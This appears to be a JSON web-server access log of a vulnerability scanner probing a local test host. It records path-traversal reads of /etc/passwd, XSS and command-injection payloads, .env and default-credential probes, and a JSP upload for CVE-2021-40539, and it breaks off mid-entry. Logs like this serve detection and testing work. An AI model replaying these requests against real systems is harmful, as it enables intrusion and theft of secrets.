/actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-zoomsounds/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/status.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics/v1/mbeans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; 